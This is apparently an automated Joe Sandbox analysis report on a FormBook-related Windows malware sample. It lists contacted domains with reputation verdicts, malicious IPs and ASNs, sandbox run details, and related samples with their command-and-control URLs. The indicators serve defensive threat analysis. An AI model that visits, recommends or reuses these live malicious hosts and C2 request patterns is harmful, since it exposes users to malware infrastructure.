                                http://www.cascadefinnish.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.videopromarket.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cascadefinnish.com/bp31/www.alnawrasalrahhal.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.darkpinefarm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cascadefinnish.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://outlook.comexplorer.exe, 00000004.00000002.4541926212.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Database1DataSet.xsdexplorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fixerradvisory.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.alnawrasalrahhal.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.darkpinefarm.com/bp31/www.adminonlinechecker.onlineexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.millerstoehr.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.alnawrasalrahhal.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.videopromarket.com/bp31/www.turdfi.xyzexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.adminonlinechecker.online/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.fnb.gay/bp31/www.fixerradvisory.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000003.3095509048.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2076988061.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.biddrivego.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.spitzpr-gq.info/bp31/www.piabellacasino347.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bolfm.com/bp31/www.videopromarket.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.fnb.gay/&Ocontrol.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bolfm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.piabellacasino347.com/bp31/www.darkpinefarm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://api.msn.com/explorer.exe, 00000004.00000002.4540698292.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://www.millerstoehr.com/bp31/www.bolfm.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.gchzwf.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.piabellacasino347.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://crl.vexplorer.exe, 00000004.00000002.4531444837.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.biddrivego.com/bp31/www.cascadefinnish.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.spitzpr-gq.infoexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.198.102
                                      www.tqmsn.comUnited States
                                      13335CLOUDFLARENETUStrue
                                      130.61.77.41
                                      www.fnb.gayUnited States
                                      31898ORACLE-BMC-31898UStrue
                                      195.35.38.7
                                      alnawrasalrahhal.comGermany
                                      8359MTSRUtrue
                                      3.33.130.190
                                      millerstoehr.comUnited States
                                      8987AMAZONEXPANSIONGBtrue
                                      103.224.212.216
                                      www.biddrivego.comAustralia
                                      133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                      Joe Sandbox Version:38.0.0 Ammolite
                                      Analysis ID:1348466
                                      Start date and time:2023-11-27 12:08:14 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 51s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:UgHXEfw1uL.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:e8fc0040e6882e0b9ea0e830b6d74d65.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@53/1@12/5
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 216
                                      • Number of non-executed functions: 293
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      12:09:05API Interceptor19x Sleep call for process: UgHXEfw1uL.exe modified
                                      12:09:13API Interceptor7173419x Sleep call for process: explorer.exe modified
                                      12:09:59API Interceptor7115270x Sleep call for process: control.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      130.61.77.41Quotation.xlsGet hashmaliciousFormBookBrowse
                                        3.33.130.190transfer_20231124.exeGet hashmaliciousFormBookBrowse
                                        • www.mnl2023.club/ui23/?YfITm=1YW5W3xEmlrAXHluOA03wNasZbzRYXu8HDBrXg1DQyLocQFT2xVtg2qMrWMJMl+v1y2R&rZJdb=zL08q
                                        Swift_TT_Copy_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.increasingmyhappiness.com/st58/?Db8=ijWSzD2hQApb+943SCj8Hn8W7Wr9j/KsczcDzHXmTGr5JYwCLVE9kI9Ao/0pgr7u17gcEWkfZA==&R0=dhux_2qHhFu4sXm
                                        SecuriteInfo.com.Win32.PWSX-gen.29998.25521.exeGet hashmaliciousFormBookBrowse
                                        • www.faithfulapparelshop.com/wm14/?0hiPDN9=ZJ1BM8sRj/TrRfvc81AJOtc30YiaL4i/wPUXyGLjIZMo4C1z3xgXR0XLmfE0hPjUKDur&StKTz=ZDKPLRQ8-H
                                        RE.Re,price_lists_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.ribbon-555.com/cc73/?Sxlhvp-=pYqxPn4pw7CMvBxfDzAK5B8/8lrJu6b06PjiyLgHDNdl5qnkrlcYl2AG9GCwnjktQ8ATOOq9bg==&SN=sRgDeNxxCdoLgvh
                                        22#U042b.exeGet hashmaliciousFormBookBrowse
                                        • www.venitro.com/gy14/?bv4=YV8HGVGPJLB&5jm0rFGp=ilRqsC0U36R0U35ug5ma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUn74uYos+5Uh
                                        PI_and_payment_confirmed_pdf.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                        • www.alwaystuesdaytacos.com/n7ak/
                                        L8eag4feVJ.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.motenm.com/t2ti/?JlD=unw8hvtPgxohP&VZ=lKsuyYBnfKaQI7tojUxq63UnQ/o4AVsR/S67jzA3LECfvDuBQMIGaSTuIf5bK4isSu5L
                                        klWGq3yDcQ.exeGet hashmaliciousUnknownBrowse
                                        • gmailvz.com/admin.php
                                        F0sgNHIqn8.exeGet hashmaliciousFormBookBrowse
                                        • www.whatagoof.com/pui9/?vN6l=BZLdPp9pX24P2&pFQHX668=eFyshTppN4VDXVWzttR/Y97x84c8SKnSIaKjlxgefI8alMwA9wjuu5mzXrukogd7Cmmj
                                        14020611jpg.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                        • www.shearwaterpembrokeshire.com/kmge/
                                        0438_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.rrbookreviews.com/ey16/?8pFLclPX=RkQnbJQK+dqghFnrGyAqRmQ/JExbxLcuVjauQo++A/1Bsog1nVuw9UbCyswlzXdKFSOO&E8S=DZXxBX
                                        aaaaa.docGet hashmaliciousFormBookBrowse
                                        • www.11cmace.vip/o5gu/?00Dxq=GBZ0DXLhU4kXx&LjRpk=ewZYOLkLnXiE3BglIZWFNfOfbq2DtYYPGRvZ3AbpnbImRVfYFYWPh9wo5Kr/1/B6MakHjw==
                                        SKM_TR0020102023_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.ggaperformance.com/g11y/?DXIDO=YrLGzabNzF03mCTLBYsvJsHV7KoJT+wb+PowmIclNN00f7ju4fku96900DleDaG9eme7&tzrh=jlNdnlthmFpxsX
                                        E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.vastfew.com/ay62/?lfsd=GeKgvGHevWBAn+maQ59oXcZbLyVfsEOAUsIdsvGlzObY1CA72B+o44RVxGxsyTu8sw9Z&Ep=nhRlHn
                                        #U00d6denmemi#U015f_#U00d6demelerin_Kapat#U0131lmas#U0131.exeGet hashmaliciousFormBookBrowse
                                        • www.venitro.com/gy14/?j2Jxo=YTjTk4IHn&02=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh
                                        SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g==
                                        Confirma.exeGet hashmaliciousFormBookBrowse
                                        • www.canadiantrafficmanagement.net/he2a/?c6Z=q6al5R7x&9rIdTlI=8QFQCqD9FRlMZfde71PklYjLEob+si+Y9aKcIwfPHn9Ij3TA880ZABCw2tr5vOD0Poxe
                                        Nuevo_orden_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.awra.app/m0d5/?3f2t_LnX=hiUfbT9yhpJi+bcQh0jRPY3Wl7eZj/T4te/gMgaWTw1FmjvAcJpk9Hnme9R0LWkJMCKRHAomNg==&cp=YPMlNpnpz
                                        Payment_$5,860.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.truepanthersecurity.info/st58/?Cj=fAqS/1aKGrYljxpbu4X6H2aQdB0I7R8hcCOST+4zDPZSvo6QLnJC4z9ezIabo8sXkPtY&Kzr=lHF49jH
                                        PO#11231270.docGet hashmaliciousFormBookBrowse
                                        • www.elohiyminfotech.com/pui9/?Ftx=GcObd50+d4jDDNbr1PdCqLXjzhg6LOLbb5/IEp8vuKpL/fluFMlT9AyGIQfRapZ3d1HsnQ==&pFQtB=grvhL8lhxXPp
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        www.fnb.gayQuotation.xlsGet hashmaliciousFormBookBrowse
                                        • 130.61.77.41
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ORACLE-BMC-31898USQuotation.xlsGet hashmaliciousFormBookBrowse
                                        • 130.61.77.41
                                        Halkbank_Ekstre_20231127_093256_734631.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        Products_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        333Pkqdibr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        333Pkqdibr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        Quotation_Reference_No_DX2265.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        INVOICE0986543009070.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        https://objectstorage.ap-sydney-1.oraclecloud.com/n/idrlconj5yne/b/ndfnmdfmdsds/o/login.microsoftonline.htmGet hashmaliciousHTMLPhisherBrowse
                                        • 134.70.92.3
                                        https://objectstorage.us-phoenix-1.oraclecloud.com/n/axlhys9btmq8/b/vmexpress/o/leoleo.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 134.70.16.1
                                        https://objectstorage.us-ashburn-1.oraclecloud.com/n/idgugmx9n3oo/b/bucket-20230111-0827/o/server%20(4).htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 134.70.28.1
                                        Quotations.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        Gun_Ici_Cek_Statu_Listesi.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        Contract.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        TF-24098-001.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                        • 193.122.130.0
                                        Product_List_62994721598.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        RMPDrCqc6N.elfGet hashmaliciousMiraiBrowse
                                        • 147.154.71.5
                                        SecuriteInfo.com.Win32.TrojanX-gen.13038.29708.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        Quotation_No._001515_&_Quotation_No._001518.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        https://file.komatsupoland.com/?username=xin.xue@nb.comGet hashmaliciousUnknownBrowse
                                        • 192.29.14.118
                                        BMXYo1Gliu.elfGet hashmaliciousMiraiBrowse
                                        • 140.238.15.168
                                        CLOUDFLARENETUSPurchase_Order_copy_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.215.45
                                        File123.vbsGet hashmaliciousXWormBrowse
                                        • 172.67.215.45
                                        Quotation.xlsGet hashmaliciousFormBookBrowse
                                        • 172.67.213.211
                                        Order_enquiry.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.215.45
                                        BL_NO_WWSNSA0212JAE.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.66.9
                                        Halkbank_Ekstre_20231127_093256_734631.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.67.177.134
                                        Products_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.67.177.134
                                        Swift_TT_Copy_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 23.227.38.74
                                        SWIFT_MESAJI.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.67.177.134
                                        SecuriteInfo.com.Win32.TrojanX-gen.7663.1355.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.67.177.134
                                        New_order_133544_6390.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                        • 172.67.169.176
                                        Ziraat_Bankasi_Swift_Mesaji.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                        • 172.67.213.49
                                        https://mmmernesdf20242023.page.link/AY2aGet hashmaliciousUnknownBrowse
                                        • 1.1.1.1
                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.184.73
                                        RFQ_SP_03084_1_23_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.159.135.232
                                        333Pkqdibr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 104.21.67.152
                                        333Pkqdibr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.67.177.134
                                        DHL_Document_11221023.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.190.116
                                        pointcross.dat.exeGet hashmaliciousCHAOS RATBrowse
                                        • 104.16.133.229
                                        PRICE_LIST_FOR_NEW_QUOTE.EXE.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.214.17
                                        No context
                                        No context
                                        Process:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1415
                                        Entropy (8bit):5.352427679901606
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                        MD5:97AD91F1C1F572C945DA12233082171D
                                        SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                        SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
